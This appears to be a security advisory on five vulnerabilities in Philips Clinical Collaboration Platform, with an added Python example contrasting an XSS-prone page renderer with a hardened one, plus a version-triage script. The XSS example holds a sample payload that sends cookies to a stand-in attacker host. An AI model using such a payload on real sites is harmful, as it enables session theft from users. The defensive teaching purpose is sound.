
Philips Clinical Collaboration Platform Vulnerabilities

Five vulnerabilities in Philips Healthcare's HMI clinical data platform have been discovered. These vulnerabilities could be exploited to trick legitimate users into leaking sensitive information.


Affected platforms

The following platforms are known to be affected:

Philips Clinical Collaboration Platform Versions: 12.2.1 and earlier


Threat details

Introduction

Philips Healthcare has released details of multiple vulnerabilities affecting their Clinical Collaboration Platform clinical data management system.

Philips states that an unauthorised attacker with access to the same network as a vulnerable system could exploit some or all of these vulnerabilities to obtain sensitive information.

Product re-branding

Please note that Philips Clinical Collaboration Platform was previously branded Carestream Vue PACS, and may still be registered under that name in some organisations.


Vulnerabilities

The vulnerabilities stem mainly from the Clinical Collaboration Platform improperly validating, or failing to validate, user-supplied input and identity claims, together with one resource-handling flaw:

  • CVE-2020-14506 - Clinical Collaboration Platform does not validate that user-provided inputs have the correct parameters.
  • CVE-2020-14525 - Clinical Collaboration Platform does not sanitise user-provided inputs before they are used in web-based output (cross-site scripting).
  • CVE-2020-16198 - Clinical Collaboration Platform does not sufficiently validate user identity claims.
  • CVE-2020-16200 - Clinical Collaboration Platform does not suitably control resource allocation, which can result in a local denial-of-service condition.
  • CVE-2020-16247 - Clinical Collaboration Platform exposes resources to insufficiently authorised users.
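The first two entries above describe generic input-handling weaknesses. The following is an added illustration of that weakness class, written for this page; it is not code from the Clinical Collaboration Platform or from Philips, and the handler name, parameter name and identifier format are assumptions. It shows a request handler that reflects a parameter into HTML with no validation or encoding, beside a hardened version that checks the parameter's format and HTML-escapes what it echoes.

```python
# Added example: generic illustration of improper input validation and
# unsanitised web output, NOT Philips code. Names and the identifier format
# (letters, digits, hyphens) are assumptions made for the example.
import html
import re

# Constructed sample inputs: a benign identifier and a payload that becomes
# markup if it is reflected into a page unescaped.
BENIGN = "ST-2020-0042"
MALICIOUS = '"><script>document.location="http://attacker.example/?c="+document.cookie</script>'

# Assumed identifier format for the example.
STUDY_ID_RE = re.compile(r"^[A-Za-z0-9-]{1,32}$")


def render_search_page_vulnerable(study_id: str) -> str:
    """Reflects the parameter with no validation and no output encoding:
    any input containing markup becomes part of the rendered page."""
    return f"<p>Results for <b>{study_id}</b></p>"


def is_valid_study_id(study_id: str) -> bool:
    """Input validation: accept only values matching the expected format."""
    return bool(STUDY_ID_RE.fullmatch(study_id))


def render_search_page_hardened(study_id: str) -> str:
    """Validate first, then encode on output. A fixed error page (rather than
    echoing the rejected value) avoids reflecting the bad input at all."""
    if not is_valid_study_id(study_id):
        return "<p>Invalid study identifier.</p>"
    # quote=True also encodes " and ', so the value is safe both as element
    # text and inside a quoted attribute.
    return f"<p>Results for <b>{html.escape(study_id, quote=True)}</b></p>"


def reflects_script(page: str) -> bool:
    """Demonstration check: does the rendered page contain a raw script tag?"""
    return "<script>" in page


if __name__ == "__main__":
    print(render_search_page_vulnerable(MALICIOUS))
    print(render_search_page_hardened(MALICIOUS))
    print(render_search_page_hardened(BENIGN))
```

The fix is the combination, not either half: validation narrows what the handler accepts, and output encoding protects the cases where a value must be echoed and validation alone cannot rule out every dangerous character.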

Remediation advice

Philips has confirmed that all five vulnerabilities have been addressed in the following updates:

  • Clinical Collaboration Platform version 12.2.1.5 - June 2020 - addresses CVE-2020-14506 and CVE-2020-14525
  • Clinical Collaboration Platform version 12.2.5 - May 2020 - addresses CVE-2020-16198, CVE-2020-16200, and CVE-2020-16247

Affected organisations are encouraged to contact their relevant suppliers to obtain and apply these updates. For further information, please contact Philips Healthcare support.
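Deciding whether an installed build falls in "12.2.1 and earlier" needs a numeric, component-wise comparison: compared as strings, "12.2.10" sorts before "12.2.9" and "12.2.1.5" is not obviously later than "12.2.1". The following is an added example for this page, not a Philips tool; it assumes versions are reported as dotted integers as printed above, and the inventory records are constructed sample data.

```python
# Added example: triage an inventory against the advisory's affected range
# ("12.2.1 and earlier"). Not a Philips tool; version strings are assumed to
# be dotted integers, and SAMPLE_INVENTORY is constructed for the example.
from __future__ import annotations
import re

LAST_AFFECTED = "12.2.1"  # "12.2.1 and earlier" per the advisory

_VERSION_RE = re.compile(r"^\d+(\.\d+)*$")

# Constructed sample inventory: (hostname, version as reported by the host).
SAMPLE_INVENTORY = [
    ("pacs-01", "12.2.1"),
    ("pacs-02", "12.2.1.5"),
    ("pacs-03", "12.2.5"),
    ("pacs-04", "12.1.0"),
    ("pacs-05", "n/a"),
]


def parse_version(version: str) -> tuple[int, ...]:
    """Turn '12.2.1.5' into (12, 2, 1, 5); reject anything that is not dotted integers."""
    version = version.strip()
    if not _VERSION_RE.fullmatch(version):
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in version.split("."))


def compare_versions(a: str, b: str) -> int:
    """Return -1, 0 or 1 for a < b, a == b, a > b.
    Missing trailing components count as 0, so '12.2.1' == '12.2.1.0'
    and '12.2.1.5' > '12.2.1'."""
    pa, pb = parse_version(a), parse_version(b)
    width = max(len(pa), len(pb))
    pa += (0,) * (width - len(pa))
    pb += (0,) * (width - len(pb))
    return (pa > pb) - (pa < pb)


def is_affected(installed: str) -> bool:
    """True when the installed version is 12.2.1 or earlier."""
    return compare_versions(installed, LAST_AFFECTED) <= 0


def triage(inventory: list[tuple[str, str]]) -> dict[str, list[str]]:
    """Sort hosts into affected / not_affected / unknown. A version string that
    cannot be parsed is reported as unknown rather than silently treated as safe."""
    result: dict[str, list[str]] = {"affected": [], "not_affected": [], "unknown": []}
    for host, version in inventory:
        try:
            bucket = "affected" if is_affected(version) else "not_affected"
        except ValueError:
            bucket = "unknown"
        result[bucket].append(host)
    return result


if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

Hosts in the "unknown" bucket need manual confirmation of the installed build; treating an unparseable version as patched would hide exactly the systems most likely to be out of date.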


Last edited: 21 September 2020 1:20 pm